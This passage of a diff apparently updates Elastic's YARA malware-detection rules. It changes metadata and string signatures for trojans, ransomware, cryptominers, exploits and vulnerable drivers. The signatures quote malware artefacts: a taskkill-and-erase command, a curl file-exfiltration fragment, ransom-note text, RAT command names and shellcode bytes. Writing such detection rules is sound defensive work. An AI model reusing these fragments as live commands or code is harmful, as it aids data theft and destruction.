"C:\\Users\\Ddani\\source\\repos\\onlyLogger\\Release\\onlyLogger.pdb" ascii fullword - $b1 = "iplogger.org" ascii fullword - $b2 = "NOT elevated" ascii fullword - $b3 = "WinHttpSendRequest" ascii fullword + $str1 = "BlackBone: %s: ZwCreateThreadEx hThread 0x%X" condition: - 1 of ($a*) or all of ($b*) + int16 ( uint32(0x3C)+0x5c)==0x0001 and $str1 } -rule ELASTIC_Windows_Trojan_Onlylogger_Ec14D5F2 : FILE MEMORY +rule ELASTIC_Windows_Vulndriver_Agent64_8Ef48Aeb : FILE { meta: - description = "Detects Windows Trojan Onlylogger (Windows.Trojan.OnlyLogger)" + description = "Subject: eSupport.com, Inc OR Phoenix Technologies Ltd, Name: Agent64.sys, Version: 6.0" author = "Elastic Security" - id = "ec14d5f2-5716-47f3-a7fb-98ec2d8679d1" - date = "2022-03-22" - modified = "2022-04-12" + id = "8ef48aeb-56b2-408b-aaf1-b130d7eb1cf4" + date = "2022-07-19" + modified = "2022-07-19" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_OnlyLogger.yar#L24-L46" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "f45adcc2aad5c0fd900df4521f404bc9ca71b01e3378a5490f5ae2f0c711912e" - logic_hash = "2838851a5e013705b64625801d2ab1d56cfc17c52f75a5fd71448cb0a4b4b683" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_Agent64.yar#L1-L25" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "05f052c64d192cf69a462a5ec16dda0d43ca5d0245900c9fcb9201685a2e7748" + hash = "4045ae77859b1dbf13972451972eaaf6f3c97bea423e9e78f1c2f14330cd47ca" + logic_hash = "a35f82202507e582e3cbc7018656545fcee1244ec1638a696f0b7c970fd5023c" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "c69da3dfe0a464665759079207fbc0c82e690d812b38c83d3f4cd5998ecee1ff" - severity = 100 + tags = "FILE" + fingerprint = "3eab3bb33b75aec13d91d503a768001fc0da09a41c792904e4a5eab568b4f6f4" + threat_name = "Windows.VulnDriver.Agent64" + severity = 50 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" os = "windows" strings: - $a1 = "KILLME" ascii fullword - $a2 = "%d-%m-%Y %H" ascii fullword - $a3 = "/c taskkill /im \"" ascii fullword - $a4 = "\" /f & erase \"" ascii fullword - $a5 = "/info.php?pub=" ascii fullword + $subject_name_1 = { 06 03 55 04 03 [2] 50 68 6F 65 6E 69 78 20 54 65 63 68 6E 6F 6C 6F 67 69 65 73 20 4C 74 64 } + $subject_name_2 = { 06 03 55 04 03 [2] 65 53 75 70 70 6F 72 74 2E 63 6F 6D 2C 20 49 6E 63 } + $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 [1-8] 41 00 67 00 65 00 6E 00 74 00 36 00 34 00 2E 00 73 00 79 00 73 00 00 00 } + $product_version = { 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E [1-8] 36 00 2E 00 30 } + $product_name = { 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 4E 00 61 00 6D 00 65 [1-8] 44 00 72 00 69 00 76 00 65 00 72 00 41 00 67 00 65 00 6E 00 74 } condition: - all of them + int16 ( uint32(0x3C)+0x5c)==0x0001 and int16 ( uint32(0x3C)+0x18)==0x020b and any of ($subject_name*) and $original_file_name and $product_version and $product_name } -rule ELASTIC_Windows_Packer_Scrubcrypt_6A75A4Bb : FILE MEMORY +rule ELASTIC_Windows_Trojan_Bitrat_34Bd6C83 : FILE MEMORY { meta: - description = "Detects Windows Packer Scrubcrypt (Windows.Packer.ScrubCrypt)" + description = "Detects Windows Trojan Bitrat (Windows.Trojan.Bitrat)" author = "Elastic Security" - id = "6a75a4bb-8026-4c33-af39-621d76f3baba" - date = "2023-04-18" - modified = "2023-06-13" + id = "34bd6c83-9a71-43d5-b0b1-1646a8fb66e8" + date = "2021-06-13" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Packer_ScrubCrypt.yar#L1-L20" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "05c1eea2ff8c31aa5baf1dfd8015988f7e737753275ed1c8c29013a3a7414b50" - logic_hash = "edcaa6f1cc85ef084ae5bf2524f39869a90b008dce85e72bca4835565f067ca7" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Bitrat.yar#L1-L23" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "37f70ae0e4e671c739d402c00f708761e98b155a1eefbedff1236637c4b7690a" + logic_hash = "d386fc2a4b6a98638328d1aa05a8d8dbb7a1bbcd72943457b1a5a27b056744ef" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "263175cbdc74502a595664833c90bf0a27f2bf20c227775658d552e29d98620e" + fingerprint = "bc4a5fad1810ad971277a455030eed3377901a33068bb994e235346cfe5a524f" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -74681,29 +75096,32 @@ rule ELASTIC_Windows_Packer_Scrubcrypt_6A75A4Bb : FILE MEMORY os = "windows" strings: - $a = { 43 68 65 63 6B 52 65 6D 6F 74 65 44 65 62 75 67 67 65 72 50 72 65 73 65 6E 74 00 49 73 44 65 62 75 67 67 65 72 50 72 65 73 65 6E 74 } - $b = { 53 63 72 75 62 43 72 79 70 74 00 53 74 61 72 74 } + $a1 = "crd_logins_report" ascii fullword + $a2 = "drives_get" ascii fullword + $a3 = "files_get" ascii fullword + $a4 = "shell_stop" ascii fullword + $a5 = "hvnc_start_ie" ascii fullword condition: all of them } -rule ELASTIC_Windows_Ransomware_Generic_99F5A632 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Bitrat_54916275 : FILE MEMORY { meta: - description = "Detects Windows Ransomware Generic (Windows.Ransomware.Generic)" + description = "Detects Windows Trojan Bitrat (Windows.Trojan.Bitrat)" author = "Elastic Security" - id = "99f5a632-8562-4321-b707-c5f583b14511" - date = "2022-02-24" - modified = "2022-02-24" + id = "54916275-2a0f-4966-956d-7122a4aea9c8" + date = "2022-08-29" + modified = "2022-09-29" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Generic.yar#L1-L22" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "4dc13bb83a16d4ff9865a51b3e4d24112327c526c1392e14d56f20d6f4eaf382" - logic_hash = "2284cfc91d17816f1733e8fe319af52bc66af467364d27f84e213082c216ae8b" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Bitrat.yar#L25-L43" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "d3b2c410b431c006c59f14b33e95c0e44e6221b1118340c745911712296f659f" + logic_hash = "4c66f79f4bf6bde49bfb9208e6dc1d3b5d041927565e7302381838b0f32da6f4" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "84ab8d177e50bce1a3eceb99befcf05c7a73ebde2f7ea4010617bf4908257fdb" + fingerprint = "8758b1a839ff801170f6d4ae9186a69af6370f8081defdd25b62e50a3ddcffef" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -74711,10 +75129,7 @@ rule ELASTIC_Windows_Ransomware_Generic_99F5A632 : FILE MEMORY os = "windows" strings: - $a1 = "stephanie.jones2024@protonmail.com" - $a2 = "_/C_/projects/403forBiden/wHiteHousE.init" ascii fullword - $a3 = "All your files, documents, photoes, videos, databases etc. have been successfully encrypted" ascii fullword - $a4 = "

Do not try to decrypt then by yourself - it's impossible" ascii fullword + $a1 = { 6A 10 68 50 73 78 00 E8 5F 4D 02 00 8B 7D 08 85 FF 75 0D FF 15 1C 00 6E 00 50 FF 15 68 03 6E 00 } condition: all of them @@ -74728,8 +75143,8 @@ rule ELASTIC_Linux_Cryptominer_Xmrminer_70C153B5 : FILE MEMORY date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Xmrminer.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Xmrminer.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" hash = "55b133ba805bb691dc27a5d16d3473650360c988e48af8adc017377eed07935b" logic_hash = "e2fc0721435c656a16e59b6747563df17f0f54a4620efc403a3bba717ccb0f38" score = 75 @@ -74757,8 +75172,8 @@ rule ELASTIC_Linux_Cryptominer_Xmrminer_98B00F9C : FILE MEMORY date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Xmrminer.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Xmrminer.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" hash = "c01b88c5d3df7ce828e567bd8d639b135c48106e388cd81497fcbd5dcf30f332" logic_hash = "cf8c5deddf22e7699cd880bd3f9f28721db5ece6705be4f932e1d041893eef71" score = 75 @@ -74786,8 +75201,8 @@ rule ELASTIC_Linux_Cryptominer_Xmrminer_2B250178 : FILE MEMORY date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Xmrminer.yar#L41-L59" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Xmrminer.yar#L41-L59" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" hash = "636605cf63d3e335fe9481d4d110c43572e9ab365edfa2b6d16d96b52d6283ef" logic_hash = "067705c52de710372b4a2a3b77427106068ad2d9a8e56602e315d09e7b8b6206" score = 75 @@ -74815,8 +75230,8 @@ rule ELASTIC_Linux_Cryptominer_Xmrminer_67Bf4B54 : FILE MEMORY date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Xmrminer.yar#L61-L79" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Xmrminer.yar#L61-L79" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" hash = "9d33fba4fda6831d22afc72bf3d6d5349c5393abb3823dfa2a5c9e391d2b9ddf" logic_hash = "448f5b9dc3c17984464c15f6d542f495a52b0531acc362dedfe3d1a20b932969" score = 75 @@ -74844,8 +75259,8 @@ rule ELASTIC_Linux_Cryptominer_Xmrminer_504B42Ca : FILE MEMORY date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Xmrminer.yar#L81-L98" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Xmrminer.yar#L81-L98" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" logic_hash = "dd3ed5350e0229ac714178a30de28893c30708734faec329c776e189493cf930" score = 75 quality = 75 @@ -74872,8 +75287,8 @@ rule ELASTIC_Linux_Cryptominer_Xmrminer_D1Bb752F : FILE MEMORY date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Xmrminer.yar#L100-L118" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Xmrminer.yar#L100-L118" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" hash = "bea55bc9495ee51c78ceedadf3a685ea9d6dd428170888c67276c100d4d94beb" logic_hash = "47aa5516350d5c00d1387649df46ce8f09d87bdfafeaa4cbf1c3ef5f2e0b9023" score = 75 @@ -74901,8 +75316,8 @@ rule ELASTIC_Linux_Cryptominer_Xmrminer_D625Fcd2 : FILE MEMORY date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Xmrminer.yar#L120-L137" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Xmrminer.yar#L120-L137" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" logic_hash = "b95b66392e1a07e0b6acd718a9501cede76e57561e69701e9e881bd3fbd3fe39" score = 75 quality = 75 @@ -74929,8 +75344,8 @@ rule ELASTIC_Linux_Cryptominer_Xmrminer_02D19C01 : FILE MEMORY date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Xmrminer.yar#L139-L157" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Xmrminer.yar#L139-L157" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" hash = "b6df662f5f7566851b95884c0058e7476e49aeb7a96d2aa203393d88e584972f" logic_hash = "43a1dc49bf75cd13637c37290d47b4d6fc1b2c2ac252b64725c0c64e1dd745c6" score = 75 @@ -74958,8 +75373,8 @@ rule ELASTIC_Linux_Cryptominer_Xmrminer_2Dd045Fc : FILE MEMORY date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Xmrminer.yar#L159-L177" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Xmrminer.yar#L159-L177" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" hash = "30a77ab582f0558829a78960929f657a7c3c03c2cf89cd5a0f6934b79a74b7a4" logic_hash = "fa23ca75027f7a5e73652173c9e84112a0b5cd3008fc453fdb33c980dc7b7b24" score = 75 @@ -74987,8 +75402,8 @@ rule ELASTIC_Linux_Cryptominer_Xmrminer_D1A814B0 : FILE MEMORY date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Xmrminer.yar#L179-L197" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Xmrminer.yar#L179-L197" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" hash = "bea55bc9495ee51c78ceedadf3a685ea9d6dd428170888c67276c100d4d94beb" logic_hash = "a06f5d5be87153be1253c2e20a60fa36701a745813926be03ee466ce8e2285b0" score = 75 @@ -75016,8 +75431,8 @@ rule ELASTIC_Linux_Cryptominer_Xmrminer_C6218E30 : FILE MEMORY date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Xmrminer.yar#L199-L217" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Xmrminer.yar#L199-L217" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" hash = "b43ddd8e355b0c538c123c43832e7c8c557e4aee9e914baaed0866ee5d68ee55" logic_hash = "3efbc3cb1591a9340df10640b411a9ab4c41e0aa26c1677d9def8b82e4c246f4" score = 75 @@ -75045,8 +75460,8 @@ rule ELASTIC_Linux_Cryptominer_Xmrminer_B17A7888 : FILE MEMORY date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Xmrminer.yar#L219-L237" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Xmrminer.yar#L219-L237" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" hash = "65c9fdd7c559554af06cd394dcebece1bc0fdc7dd861929a35c74547376324a6" logic_hash = "a7f6daa5c42d186d2c5a027fdb35b45287c3564a7b57b8a2f53659e6ca90602a" score = 75 @@ -75065,52 +75480,57 @@ rule ELASTIC_Linux_Cryptominer_Xmrminer_B17A7888 : FILE MEMORY condition: all of them } -rule ELASTIC_Linux_Exploit_Wuftpd_0991E62F : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Akira_C8C298Ba : FILE MEMORY { meta: - description = "Detects Linux Exploit Wuftpd (Linux.Exploit.Wuftpd)" + description = "Detects Windows Ransomware Akira (Windows.Ransomware.Akira)" author = "Elastic Security" - id = "0991e62f-af72-416a-b88b-6bc8a501b8bb" - date = "2021-04-06" - modified = "2021-09-16" + id = "c8c298ba-2760-4880-a54a-3d916049d0ab" + date = "2024-05-02" + modified = "2024-05-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_Wuftpd.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "c0b6303300f38013840abe17abe192db6a99ace78c83bc7ef705f5c568bc98fd" - logic_hash = "71ad26a182c7f16e7e0ad7f7afe0dcf1d38fe953dc0806341d7e21ee4acea87d" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Akira.yar#L1-L24" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "a2df5477cf924bd41241a3326060cc2f913aff2379858b148ddec455e4da67bc" + logic_hash = "9058c83693e93f6daee8894453e56e0d9a4867d551ec3a6b66d7a517f65d8b07" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "642c7b059fa604a0a5110372e2247da9625b07008b012fd498670a6dd1b29974" + fingerprint = "81c6dfa172ce7f4254e3cc74fcb71786336d39438d6e9379f7611495f54227c9" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { F3 8D 4E 08 8D 56 0C B0 0B CD 80 31 C0 31 DB } + $a1 = "akira_readme.txt" ascii fullword + $a2 = "Number of threads to encrypt = " ascii fullword + $a3 = "write_encrypt_info error:" ascii fullword + $a4 = "Log-%d-%m-%Y-%H-%M-%S" ascii fullword + $a5 = "--encryption_path" wide fullword + $a6 = "--encryption_percent" wide fullword condition: - all of them + 3 of them } -rule ELASTIC_Linux_Trojan_Sshdoor_97F92Ff7 : FILE MEMORY +rule ELASTIC_Linux_Exploit_CVE_2014_3153_1C1E02Ad : FILE MEMORY CVE_2014_3153 { meta: - description = "Detects Linux Trojan Sshdoor (Linux.Trojan.Sshdoor)" + description = "Detects Linux Exploit Cve 2014 3153 (Linux.Exploit.CVE-2014-3153)" author = "Elastic Security" - id = "97f92ff7-b14f-4cdf-aef7-d1ca3e46ae48" + id = "1c1e02ad-eb06-4eb6-a424-0f1dd6eebb2a" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Sshdoor.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "2e1d909e4a6ba843194f9912826728bd2639b0f34ee512e0c3c9e5ce4d27828e" - logic_hash = "a883c790fd7fdeb0ca6de5fcf4dd69a996b6d85db3179a8a28adbbbc1dc01bc6" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_CVE_2014_3153.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "64b8c61b73f0c0c0bd44ea5c2bcfb7b665fcca219dbe074a4a16ae20cd565812" + logic_hash = "42e9de7f306343c4c3e7fd02b414b429faacb837fb2910f98f0c1519da40074c" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "4ad5b6b259655bf1bf58d662cf3daf3fec6ba61fcff36e24e8d239e99a8bd36f" + tags = "FILE, MEMORY, CVE-2014-3153" + fingerprint = "a0a82cd15713be3f262021d6ed6572a0d4763ccfd0499e6b9374764c89705c2a" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -75118,231 +75538,248 @@ rule ELASTIC_Linux_Trojan_Sshdoor_97F92Ff7 : FILE MEMORY os = "linux" strings: - $a = { C0 75 C3 48 8B 44 24 08 64 48 33 04 25 28 00 00 00 75 07 48 83 } + $a = { 55 48 89 E5 48 83 EC 40 48 89 7D C8 48 8D 4D D0 48 8B 45 C8 BA 24 00 } condition: all of them } -rule ELASTIC_Linux_Trojan_Sshdoor_5B78Aa01 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Pizzapotion_D334C613 : FILE MEMORY { meta: - description = "Detects Linux Trojan Sshdoor (Linux.Trojan.Sshdoor)" + description = "Detects Windows Trojan Pizzapotion (Windows.Trojan.PizzaPotion)" author = "Elastic Security" - id = "5b78aa01-c5d4-4281-9a2e-e3f0d3df31d3" - date = "2021-01-12" - modified = "2021-09-16" + id = "d334c613-2ef2-4627-b482-cc87589d253a" + date = "2023-09-13" + modified = "2023-09-20" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Sshdoor.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "2e1d909e4a6ba843194f9912826728bd2639b0f34ee512e0c3c9e5ce4d27828e" - logic_hash = "bcf285ac220b2b2ed9caf0943fa22ee830e5b26501c54a223e483a33e2fc63c0" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_PizzaPotion.yar#L1-L24" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "37bee101cf34a84cba49adb67a555c6ebd3b8ac7c25d50247b0a014c82630003" + logic_hash = "de7d395c8a993abf9858858e56ba0ec4acbf0fa1c8bfe4a34ae95be2205967fc" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "19369c825bc8052bfc234a457ee4029cf48bf3b5b9a008a1a6c2680b97ae6284" + fingerprint = "4c1ed20b669750f2bc837b184226608e2e8473ac60881fbdd47709e147616889" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 11 75 39 41 0F B6 77 01 4C 89 E2 40 84 F6 74 2C 40 80 FE 5A } + $a1 = "%s%sd.sys" ascii fullword + $a2 = "curl -v -k -F \"file=@" ascii fullword + $a3 = "; type=image/jpeg\" --referer drive.google.com --cookie" + $a4 = "%sd.sys -r -inul" + $a5 = ".xls d:\\*.xlsx d:\\*.ppt d:\\*.pptx d:\\*.pfx" ascii fullword + $a6 = "-x\"*.exe\" -x\"*.dll\" -x\"*.jpg\" -x\"*.jpeg\"" condition: - all of them + 4 of them } -rule ELASTIC_Linux_Trojan_Sshdoor_1B443A9B : FILE MEMORY +rule ELASTIC_Windows_Vulndriver_Sandra_5D112Feb : FILE { meta: - description = "Detects Linux Trojan Sshdoor (Linux.Trojan.Sshdoor)" + description = "Name: SANDRA, Version: 10.12.0.0" author = "Elastic Security" - id = "1b443a9b-2bd2-4b63-baaa-d66ca43ba521" - date = "2021-01-12" - modified = "2021-09-16" + id = "5d112feb-dc0a-464c-9753-695bb510f5a8" + date = "2022-04-07" + modified = "2022-04-07" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Sshdoor.yar#L41-L59" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "a33112daa5a7d31ea1a1ca9b910475843b7d8c84d4658ccc00bafee044382709" - logic_hash = "4afcd7103a14d59abc08d9e03182a985e3d0250c09aad5e81fd110c6a95f29e0" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_Sandra.yar#L1-L21" + license_url = 